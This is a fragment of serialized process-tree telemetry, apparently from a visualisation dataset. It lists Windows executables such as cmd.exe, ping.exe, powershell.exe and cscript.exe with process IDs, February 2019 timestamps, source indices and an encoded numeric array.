12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x19f42019-02-10 12:48:16.093000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x20202019-02-10 12:48:16.107000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x9182019-02-10 12:48:16.123000\",\"c:\\\\windows\\\\system32\\\\reg.exe0xf202019-02-10 12:48:33.300000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x10082019-02-10 12:48:33.317000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x23ec2019-02-10 12:48:51.180000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x22742019-02-10 12:48:51.207000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x1f882019-02-10 12:49:08.373000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x239c2019-02-10 12:49:09.170000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x17702019-02-10 12:49:26.303000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xfc02019-02-10 12:49:26.333000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x7f82019-02-10 12:49:43.463000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x18602019-02-10 12:49:43.483000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x1dec2019-02-10 12:50:00.633000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xb002019-02-10 12:50:00.660000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xeb02019-02-10 12:50:17.820000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x158c2019-02-10 12:50:17.833000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x7942019-02-10 12:50:35.010000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x4582019-02-10 12:50:35.033000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x1b002019-02-10 12:50:52.190000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xb282019-02-10 12:50:52.227000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0x6342019-02-10 12:51:09.383000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x16a82019-02-10 12:51:09.400000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x1e682019-02-10 12:51:26.553000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xa982019-02-10 12:51:27.350000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x14c82019-02-10 12:51:44.527000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x6c02019-02-10 12:51:44.540000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x22c02019-02-10 12:52:01.710000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x22802019-02-10 12:52:01.737000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xccc2019-02-10 12:52:18.887000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x67c2019-02-10 12:52:18.950000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x8782019-02-10 12:52:38.103000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x13d82019-02-10 12:52:38.123000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x14582019-02-10 12:53:00.327000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xa242019-02-10 12:53:00.350000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x1cd82019-02-10 12:53:16.500000\",\"c:\\\\windows\\\\system32\\\\taskhostw.exe0x14202019-02-10 12:59:59.870000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0x8f82019-02-10 13:28:02.253000\",\"c:\\\\windows\\\\system32\\\\usoclient.exe0xc5c2019-02-10 13:55:20.800000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x1f882019-02-10 13:55:20.813000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0x1cd82019-02-10 14:28:02.247000\",\"c:\\\\windows\\\\system32\\\\wermgr.exe0x19d82019-02-09 22:55:10.333000\",\"c:\\\\windows\\\\system32\\\\wermgr.exe0x1e3c2019-02-10 15:07:12.880000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0x1a9c2019-02-10 15:28:02.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x12602019-02-10 15:44:47.267000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x55c2019-02-10 15:44:47.450000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x115c2019-02-10 15:44:47.467000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x20682019-02-10 15:44:47.483000\",\"c:\\\\windows\\\\system32\\\\reg.exe0x11dc2019-02-10 15:45:07.637000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x13e42019-02-10 15:45:07.653000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x15242019-02-10 15:45:27.887000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x17b02019-02-10 15:45:27.907000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x8c42019-02-10 15:45:57.147000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x22282019-02-10 15:45:58.020000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x1cf02019-02-10 15:46:22.260000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x18602019-02-10 15:46:22.287000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x18742019-02-10 15:46:44.473000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xa902019-02-10 15:46:44.503000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x11a82019-02-10 15:47:06.720000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x173c2019-02-10 15:47:06.750000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x19102019-02-10 15:47:31.987000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1db42019-02-10 15:47:32.003000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x4382019-02-10 15:47:45.133000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x20182019-02-10 15:47:45.153000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x21c82019-02-10 15:47:49.197000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x20442019-02-10 15:47:49.223000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0x22002019-02-10 15:47:49.237000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x11242019-02-10 15:47:49.253000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0xd442019-02-10 15:48:03.363000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11982019-02-10 15:48:04.297000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x135c2019-02-10 15:48:04.310000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xd042019-02-10 15:48:04.323000\",\"c:\\\\windows\\\\system32\\\\reg.exe0x23642019-02-10 15:48:18.437000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x11102019-02-10 15:48:18.460000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x9942019-02-10 15:48:32.593000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x23282019-02-10 15:48:32.613000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x6d42019-02-10 15:48:46.753000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x20e42019-02-10 15:48:47.493000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x19982019-02-10 15:49:01.577000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xf542019-02-10 15:49:01.603000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x5a82019-02-10 15:49:15.733000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1db82019-02-10 15:49:15.750000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x1fa42019-02-10 15:49:29.877000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x6042019-02-10 15:49:29.903000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x1f242019-02-10 15:49:44.043000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x5182019-02-10 15:49:44.060000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x21702019-02-10 15:49:58.200000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x12a82019-02-10 15:49:58.227000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x200c2019-02-10 15:50:12.367000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xf802019-02-10 15:50:12.397000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0x18602019-02-10 15:50:26.530000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x18742019-02-10 15:50:26.550000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0xccc2019-02-10 15:50:40.703000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xd7c2019-02-10 15:50:56.413000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x16342019-02-10 15:51:10.573000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x17482019-02-10 15:51:10.590000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x18982019-02-10 15:51:24.723000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1eb42019-02-10 15:51:24.747000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x14682019-02-10 15:51:38.890000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x22002019-02-10 15:51:38.953000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x1e8c2019-02-10 15:51:39.990000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x23482019-02-10 15:51:40.003000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x11f02019-02-10 15:51:41.033000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1f202019-02-10 15:51:41.053000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x14802019-02-10 15:51:49.140000\"],\"source_index\":[\"1002\",\"110\",\"111\",\"112\",\"113\",\"114\",\"115\",\"116\",\"117\",\"118\",\"119\",\"125\",\"126\",\"138\",\"14\",\"142\",\"143\",\"144\",\"145\",\"146\",\"147\",\"148\",\"149\",\"150\",\"151\",\"152\",\"153\",\"154\",\"155\",\"156\",\"157\",\"158\",\"159\",\"160\",\"161\",\"162\",\"163\",\"164\",\"165\",\"166\",\"167\",\"168\",\"169\",\"198\",\"199\",\"200\",\"201\",\"202\",\"203\",\"204\",\"205\",\"209\",\"210\",\"211\",\"212\",\"213\",\"214\",\"215\",\"216\",\"217\",\"218\",\"219\",\"220\",\"221\",\"222\",\"223\",\"224\",\"225\",\"226\",\"227\",\"228\",\"229\",\"233\",\"234\",\"235\",\"236\",\"237\",\"238\",\"239\",\"240\",\"241\",\"242\",\"243\",\"244\",\"245\",\"246\",\"247\",\"248\",\"249\",\"250\",\"251\",\"252\",\"253\",\"254\",\"255\",\"256\",\"257\",\"258\",\"259\",\"260\",\"261\",\"262\",\"263\",\"264\",\"265\",\"266\",\"267\",\"268\",\"269\",\"270\",\"271\",\"272\",\"273\",\"274\",\"275\",\"276\",\"277\",\"278\",\"279\",\"280\",\"281\",\"282\",\"283\",\"284\",\"285\",\"286\",\"287\",\"288\",\"289\",\"290\",\"291\",\"292\",\"293\",\"294\",\"295\",\"296\",\"297\",\"298\",\"299\",\"300\",\"301\",\"306\",\"307\",\"308\",\"309\",\"310\",\"311\",\"312\",\"313\",\"314\",\"315\",\"318\",\"319\",\"320\",\"321\",\"322\",\"323\",\"324\",\"325\",\"326\",\"327\",\"328\",\"329\",\"330\",\"331\",\"332\",\"333\",\"334\",\"335\",\"336\",\"337\",\"338\",\"17\",\"18\",\"19\",\"20\",\"21\",\"22\",\"23\",\"24\",\"25\",\"26\",\"27\",\"28\",\"29\",\"30\",\"31\",\"32\",\"33\",\"34\",\"35\",\"36\",\"37\",\"38\",\"39\",\"40\",\"41\",\"42\",\"43\",\"44\",\"45\",\"46\",\"47\",\"48\",\"49\",\"50\",\"51\",\"52\",\"53\",\"61\",\"62\",\"63\",\"64\",\"65\",\"66\",\"3\",\"345\",\"355\",\"356\",\"363\",\"368\",\"374\",\"375\",\"376\",\"384\",\"389\",\"390\",\"391\",\"392\",\"393\",\"394\",\"395\",\"396\",\"397\",\"398\",\"399\",\"400\",\"401\",\"402\",\"403\",\"404\",\"405\",\"406\",\"407\",\"408\",\"409\",\"410\",\"411\",\"412\",\"413\",\"414\",\"415\",\"416\",\"419\",\"420\",\"421\",\"422\",\"423\",\"424\",\"425\",\"426\",\"427\",\"428\",\"429\",\"430\",\"431\",\"432\",\"433\",\"434\",\"435\",\"436\",\"437\",\"438\",\"439\",\"440\",\"441\",\"444\",\"445\",\"446\",\"447\",\"448\",\"449\",\"450\",\"451\",\"452\",\"453\",\"454\",\"455\",\"456\",\"457\",\"458\",\"459\",\"460\",\"461\",\"462\",\"463\",\"464\",\"465\",\"466\",\"467\",\"468\",\"469\",\"470\",\"471\",\"472\",\"473\",\"474\",\"475\",\"476\",\"477\",\"478\",\"479\",\"480\",\"481\",\"482\",\"483\",\"484\",\"485\",\"486\",\"487\",\"490\",\"491\",\"493\",\"494\",\"499\",\"500\",\"501\",\"512\",\"513\",\"519\",\"532\",\"537\",\"538\",\"540\",\"543\",\"544\",\"545\",\"546\",\"547\",\"548\",\"549\",\"550\",\"551\",\"552\",\"553\",\"554\",\"555\",\"556\",\"557\",\"558\",\"559\",\"560\",\"561\",\"562\",\"563\",\"564\",\"565\",\"566\",\"567\",\"568\",\"569\",\"570\",\"571\",\"572\",\"573\",\"574\",\"577\",\"578\",\"579\",\"580\",\"581\",\"582\",\"583\",\"584\",\"585\",\"586\",\"587\",\"588\",\"589\",\"590\",\"591\",\"592\",\"593\",\"596\",\"597\",\"598\",\"599\",\"602\",\"603\",\"604\",\"605\",\"606\",\"607\",\"608\",\"609\",\"610\",\"611\",\"612\",\"613\",\"614\",\"615\",\"616\",\"617\",\"618\",\"619\",\"622\",\"623\",\"624\",\"625\",\"626\",\"627\",\"628\",\"629\",\"630\",\"635\",\"650\",\"661\",\"663\",\"664\",\"669\",\"670\",\"671\",\"672\",\"673\",\"674\",\"675\",\"676\",\"677\",\"678\",\"681\",\"682\",\"683\",\"684\",\"685\",\"686\",\"687\",\"688\",\"689\",\"690\",\"691\",\"692\",\"693\",\"694\",\"695\",\"696\",\"697\",\"698\",\"699\",\"700\",\"701\",\"702\",\"703\",\"704\",\"705\",\"706\",\"707\",\"708\",\"709\",\"710\",\"711\",\"712\",\"713\",\"714\",\"715\",\"716\",\"717\",\"718\",\"719\",\"720\",\"721\",\"722\",\"723\",\"724\",\"727\",\"728\",\"729\",\"730\",\"731\",\"732\",\"733\",\"734\",\"735\",\"736\",\"737\",\"738\",\"739\",\"740\",\"741\",\"742\",\"743\",\"744\",\"745\",\"746\",\"747\",\"748\",\"749\",\"750\",\"751\",\"752\",\"753\",\"764\",\"779\",\"785\",\"790\",\"801\",\"802\",\"803\",\"804\",\"805\",\"806\",\"807\",\"808\",\"809\",\"810\",\"811\",\"812\",\"813\",\"814\",\"815\",\"816\",\"817\",\"818\",\"819\",\"820\",\"821\",\"822\",\"823\",\"824\",\"825\",\"827\",\"829\",\"830\",\"831\",\"832\",\"833\",\"834\",\"835\",\"836\",\"837\",\"838\",\"839\",\"840\",\"841\",\"842\",\"843\",\"844\",\"845\",\"846\",\"847\",\"848\",\"849\",\"850\",\"851\",\"852\",\"855\",\"856\",\"857\",\"858\",\"859\",\"860\",\"861\",\"862\",\"863\",\"864\",\"865\",\"866\",\"867\",\"868\",\"869\",\"870\",\"871\",\"872\",\"873\",\"874\",\"875\",\"876\",\"877\",\"878\",\"879\",\"880\",\"881\",\"882\",\"883\",\"884\",\"885\",\"886\",\"887\",\"888\",\"899\",\"904\",\"905\",\"916\",\"92\",\"923\",\"932\",\"933\",\"934\",\"935\",\"936\",\"937\",\"938\",\"939\",\"940\",\"941\",\"946\",\"947\",\"948\",\"949\",\"950\",\"951\",\"952\",\"953\",\"954\",\"955\",\"956\",\"957\",\"958\",\"959\",\"960\",\"961\",\"962\",\"963\",\"964\",\"965\",\"966\",\"967\",\"968\",\"969\",\"970\",\"971\",\"972\",\"973\",\"974\",\"975\",\"976\",\"977\",\"978\",\"979\",\"980\",\"981\",\"982\",\"983\",\"984\",\"985\",\"986\",\"987\",\"988\",\"989\",\"990\",\"991\",\"992\",\"993\",\"994\",\"995\",\"996\",\"997\",\"998\",\"999\"],\"source_index_par\":{\"__ndarray__\":\"AAAAAAAA+H8AAAAAAAD4fwAAAAAACI5AAAAAAAAIjkAAAAAAAAiOQAAAAAAACI5AAAAAAAAIjkAAAAAAAAiOQAAAAAAACI5AAAAAAAAIjkAAAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAOiLQAAAAAAA6ItAAAAAAADoi0AAAAAAAOiLQAAAAAAA6ItAAAAAAADoi0AAAAAAAOiLQAAAAAAA6ItAAAAAAADoi0AAAAAAADCMQAAAAAAAOIxAAAAAAAA4jEAAAAAAADiMQAAAAAAAOIxAAAAAAAA4jEAAAAAAADiMQAAAAAAAOIxAAAAAAAA4jEAAAAAAADiMQAAAAAAAOIxAAAAAAAA4jEAAAAAAAJCMQAAAAAAAmIxAAAAAAACYjEAAAAAAAJiMQAAAAAAAmIxAAAAAAACYjEAAAAAAAJiMQAAAAAAAmIxAAAAAAACYjEAAAAAAAJiMQAAAAAAAmIxAAAAAAACYjEAAAAAAAJiMQAAAAAAAmIxAAAAAAACYjEAAAAAAAJiMQAAAAAAAmIxAAAAAAACYjEAAAAAAAJiMQAAAAAAAmIxAAAAAAACYjEAAAAAAAJiMQAAAAAAAmIxAAAAAAACYjEAAAAAAAJiMQAAAAAAAmIxAAAAAAACYjEAAAAAAAJiMQAAAAAAAmIxAAAAAAACYjEAAAAAAAJiMQAAAAAAAOIxAAAAAAAA4jEAAAAAAADiMQAAAAAAA6ItAAAAAAADoi0AAAAAAAOiLQAAAAAAA6ItAAAAAAADoi0AAAAAAAOiLQAAAAAAA6ItAAAAAAADoi0AAAAAAAOiLQAAAAAAA6ItAAAAAAADoi0AAAAAAAOiLQAAAAAAA6ItAAAAAAADoi0AAAAAAAOiLQAAAAAAA6ItAAAAAAABwf0AAAAAAAIB/QAAAAAAAgH9AAAAAAACAf0AAAAAAAIB/QAAAAAAAgH9AAAAAAACAf0AAAAAAAIB/QAAAAAAAgH9AAAAAAABwgEAAAAAAAHiAQAAAAAAAeIBAAAAAAAB4gEAAAAAAAHiAQAAAAAAAeIBAAAAAAAB4gEAAAAAAAHiAQAAAAAAAeIBAAAAAAAB4gEAAAAAAAHiAQAAAAAAAeIBAAAAAAAB4gEAAAAAAAHiAQAAAAAAAeIBAAAAAAAB4gEAAAAAAAHiAQAAAAAAAgH9AAAAAAACAf0AAAAAAAIB/QAAAAAAAgH9AAAAAAACAf0AAAAAAAIB/QAAAAAAAgH9AAAAAAACAf0AAAAAAAIB/QAAAAAAAgH9AAAAAAACAf0AAAAAAAIB/QAAAAAAAgH9AAAAAAACAf0AAAAAAAIB/QAAAAAAAgH9AAAAAAAAgfkAAAAAAADB+QAAAAAAAMH5AAAAAAAAwfkAAAAAAADB+QAAAAAAAMH5AAAAAAAAwfkAAAAAAADB+QAAAAAAAMH5AAAAAAAAwfkAAAAAAADB+QAAAAAAAMH5AAAAAAAAwfkAAAAAAADB+QAAAAAAAMH5AAAAAAAAwfkAAAAAAADB+QAAAAAAAMH5AAAAAAAAwfkAAAAAAADB+QAAAAAAAMH5AAAAAAAAwfkAAAAAAADB+QAAAAAAAMH5AAAAAAAAwfkAAAAAAADB+QAAAAAAAMH5AAAAAAAAwfkAAAAAAADB+QAAAAAAAMH5AAAAAAAAwfkAAAAAAAIB/QAAAAAAAgH9AAAAAAACAf0AAAAAAAIB/QAAAAAAAgH9AAAAAAACAf0AAAAAAAOiLQAAAAAAA6ItAAAAAAADoi0AAAAAAAOiLQAAAAAAA6ItAAAAAAADoi0AAAAAAAAD4fwAAAAAA+I5AAAAAAAD4jkAAAAAAAPiOQAAAAAAA+I5AAAAAAAD4jkAAAAAAAPiOQAAAAAAAAPh/AAAAAACoikAAAAAAAKiKQAAAAAAAqIpAAAAAAACoikAAAAAAAKiKQAAAAAAAqIpAAAAAAACoikAAAAAAAKiKQAAAAAAAqIpAAAAAAADwikAAAAAAAPiKQAAAAAAA+IpAAAAAAAD4ikAAAAAAAPiKQAAAAAAA+IpAAAAAAAD4ikAAAAAAAPiKQAAAAAAA+IpAAAAAAAD4ikAAAAAAAPiKQAAAAAAA+IpAAAAAAAD4ikAAAAAAAPiKQAAAAAAA+IpAAAAAAACoikAAAAAAAKiKQAAAAAAAqIpAAAAAAACoikAAAAAAAKiKQAAAAAAAqIpAAAAAAACoikAAAAAAAKiKQAAAAAAAqIpAAAAAAACoikAAAAAAAKiKQAAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAkH5AAAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAADiHQAAAAAAAAPh/AAAAAAAA+H8AAAAAAIiIQAAAAAAAiIhAAAAAAACIiEAAAAAAAIiIQAAAAAAAiIhAAAAAAACIiEAAAAAAAIiIQAAAAAAAiIhAAAAAAACIiEAAAAAAACiEQAAAAAAAMIRAAAAAAAAwhEAAAAAAADCEQAAAAAAAMIRAAAAAAAAwhEAAAAAAADCEQAAAAAAAMIRAAAAAAAAwhEAAAAAAADCEQAAAAAAAMIRAAAAAAAAwhEAAAAAAADCEQAAAAAAAMIRAAAAAAAAwhEAAAAAAADCEQAAAAAAAMIRAAAAAAACIiEAAAAAAAIiIQAAAAAAAiIhAAAAAAACIiEAAAAAAAIiIQAAAAAAAiIhAAAAAAACIiEAAAAAAAIiIQAAAAAAAiIhAAAAAAACIiEAAAAAAAIiIQAAAAAAAiIhAAAAAAACIiEAAAAAAAIiIQAAAAAAAiIhAAAAAAACIiEAAAAAAAFiBQAAAAAAAYIFAAAAAAABggUAAAAAAAGCBQAAAAAAAYIFAAAAAAABggUAAAAAAAGCBQAAAAAAAYIFAAAAAAABggUAAAAAAALCBQAAAAAAAuIFAAAAAAAC4gUAAAAAAALiBQAAAAAAAuIFAAAAAAAC4gUAAAAAAALiBQAAAAAAAuIFAAAAAAAC4gUAAAAAAALiBQAAAAAAAuIFAAAAAAAC4gUAAAAAAALiBQAAAAAAAuIFAAAAAAAC4gUAAAAAAAGCBQAAAAAAAYIFAAAAAAABggUAAAAAAAGCBQAAAAAAAYIFAAAAAAABggUAAAAAAAGCBQAAAAAAAYIFAAAAAAABggUAAAAAAAGCBQAAAAAAAYIFAAAAAAABggUAAAAAAAGCBQAAAAAAAYIFAAAAAAABggUAAAAAAAGCBQAAAAAAAYIFAAAAAAABggUAAAAAAAGCBQAAAAAAAYIFAAAAAAABggUAAAAAAAGCBQAAAAAAAiIhAAAAAAACIiEAAAAAAAIiIQAAAAAAAiIhAAAAAAACIiEAAAAAAAIiIQAAAAAAAAPh/AAAAAADAeEAAAAAAAMB4QAAAAAAA8HhAAAAAAAAA+H8AAAAAAAD4fwAAAAAAkHZAAAAAAAAA+H8AAAAAAFB6QAAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAwHJAAAAAAADAckAAAAAAAMByQAAAAAAAwHJAAAAAAADAckAAAAAAAMByQAAAAAAAwHJAAAAAAADAckAAAAAAAMByQAAAAAAAUHNAAAAAAABgc0AAAAAAAGBzQAAAAAAAYHNAAAAAAABgc0AAAAAAAGBzQAAAAAAAYHNAAAAAAABgc0AAAAAAAGBzQAAAAAAAYHNAAAAAAABgc0AAAAAAAGBzQAAAAAAAYHNAAAAAAABgc0AAAAAAAGBzQAAAAAAAYHNAAAAAAABgc0AAAAAAAMByQAAAAAAAwHJAAAAAAADAckAAAAAAAMByQAAAAAAAwHJAAAAAAADAckAAAAAAAMByQAAAAAAAwHJAAAAAAADAckAAAAAAAMByQAAAAAAAwHJAAAAAAADAckAAAAAAAMByQAAAAAAAwHJAAAAAAADAckAAAAAAAMByQAAAAAAAMHZAAAAAAABAdkAAAAAAAEB2QAAAAAAAQHZAAAAAAABAdkAAAAAAAEB2QAAAAAAAQHZAAAAAAABAdkAAAAAAAEB2QAAAAAAAQHZAAAAAAABAdkAAAAAAAEB2QAAAAAAAQHZAAAAAAABAdkAAAAAAAEB2QAAAAAAAQHZAAAAAAABAdkAAAAAAAEB2QAAAAAAAQHZAAAAAAABAdkAAAAAAAEB2QAAAAAAAQHZAAAAAAABAdkAAAAAAAEB2QAAAAAAAQHZAAAAAAABAdkAAAAAAAEB2QAAAAAAAQHZAAAAAAABAdkAAAAAAAEB2QAAAAAAAQHZAAAAAAADAckAAAAAAAMByQAAAAAAAwHJAAAAAAADAckAAAAAAAMByQAAAAAAAwHJAAAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAPiNQAAAAAAAAPh/AAAAAAAA+H8AAAAAAEBoQAAAAAAAQGhAAAAAAABAaEAAAAAAAEBoQAAAAAAAQGhAAAAAAABAaEAAAAAAAEBoQAAAAAAAQGhAAAAAAABAaEAAAAAAAGiCQAAAAAAAcIJAAAAAAABwgkAAAAAAAHCCQAAAAAAAcIJAAAAAAABwgkAAAAAAAHCCQAAAAAAAcIJAAAAAAABwgkAAAAAAAHCCQAAAAAAAcIJAAAAAAABwgkAAAAAAAHCCQAAAAAAAcIJAAAAAAABwgkAAAAAAAHCCQAAAAAAAcIJAAAAAAABAaEAAAAAAAEBoQAAAAAAAQGhAAAAAAABAaEAAAAAAAEBoQAAAAAAAQGhAAAAAAABAaEAAAAAAAEBoQAAAAAAAQGhAAAAAAABAaEAAAAAAAEBoQAAAAAAAQGhAAAAAAABAaEAAAAAAAEBoQAAAAAAAQGhAAAAAAABAaEAAAAAAAHBwQAAAAAAAgHBAAAAAAACAcEAAAAAAAIBwQAAAAAAAgHBAAAAAAACAcEAAAAAAAIBwQAAAAAAAgHBAAAAAAACAcEAAAAAAAIBwQAAAAAAAgHBAAAAAAACAcEAAAAAAAIBwQAAAAAAAgHBAAAAAAACAcEAAAAAAAIBwQAAAAAAAgHBAAAAAAACAcEAAAAAAAIBwQAAAAAAAgHBAAAAAAACAcEAAAAAAAIBwQAAAAAAAgHBAAAAAAACAcEAAAAAAAIBwQAAAAAAAgHBAAAAAAACAcEAAAAAAAIBwQAAAAAAAgHBAAAAAAACAcEAAAAAAAIBwQAAAAAAAQGhAAAAAAABAaEAAAAAAAEBoQAAAAAAAQGhAAAAAAABAaEAAAAAAAEBoQAAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAgEZAAAAAAACARkAAAAAAAIBGQAAAAAAAgEZAAAAAAACARkAAAAAAAIBGQAAAAAAAgEZAAAAAAACARkAAAAAAAIBGQAAAAAAAAEtAAAAAAACAS0AAAAAAAIBLQAAAAAAAgEtAAAAAAACAS0AAAAAAAIBLQAAAAAAAAE5AAAAAAACAS0AAAAAAAIBLQAAAAAAAgEtAAAAAAACAS0AAAAAAAIBLQAAAAAAAgEtAAAAAAACAS0AAAAAAAIBLQAAAAAAAgFFAAAAAAACAS0AAAAAAAIBLQAAAAAAAgEtAAAAAAACARkAAAAAAAIBGQAAAAAAAgEZAAAAAAACARkAAAAAAAIBGQAAAAAAAgEZAAAAAAACARkAAAAAAAIBGQAAAAAAAgEZAAAAAAACARkAAAAAAAIBGQAAAAAAAgEZAAAAAAACARkAAAAAAAIBGQAAAAAAAgEZAAAAAAACARkAAAAAAAEBVQAAAAAAAgFVAAAAAAACAVUAAAAAAAIBVQAAAAAAAgFVAAAAAAACAVUAAAAAAAIBVQAAAAAAAgFVAAAAAAACAVUAAAAAAAIBVQAAAAAAAgFVAAAAAAACAVUAAAAAAAIBVQAAAAAAAgFVAAAAAAACAVUAAAAAAAIBVQAAAAAAAgFVAAAAAAACAVUAAAAAAAIBVQAAAAAAAgFVAAAAAAACAVUAAAAAAAIBVQAAAAAAAgFVAAAAAAACAVUAAAAAAAIBVQAAAAAAAgFVAAAAAAACAVUAAAAAAAIBVQAAAAAAAgFVAAAAAAACAVUAAAAAAAIBVQAAAAAAAgEZAAAAAAACARkAAAAAAAIBGQAAAAAAAgEZAAAAAAACARkAAAAAAAIBGQAAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAwF1AAAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAADlAAAAAAAAAOUAAAAAAAAA5QAAAAAAAADlAAAAAAAAAOUAAAAAAAAA5QAAAAAAAADlAAAAAAAAAOUAAAAAAAAA5QAAAAAAAADlAAAAAAAAAOUAAAAAAAAA5QAAAAAAAADlAAAAAAAAAOUAAAAAAAAA5QAAAAAAAADlAAAAAAAAAOUAAAAAAAAA5QAAAAAAAADlAAAAAAAAAOUAAAAAAAAA5QAAAAAAAADlAAAAAAAAAOUAAAAAAAAA5QAAAAAAAADlAAAAAAACAYUAAAAAAAKBhQAAAAAAAoGFAAAAAAACgYUAAAAAAAKBhQAAAAAAAoGFAAAAAAACgYUAAAAAAAKBhQAAAAAAAoGFAAAAAAACgYUAAAAAAAKBhQAAAAAAAoGFAAAAAAACgYUAAAAAAAKBhQAAAAAAAoGFAAAAAAACgYUAAAAAAAKBhQ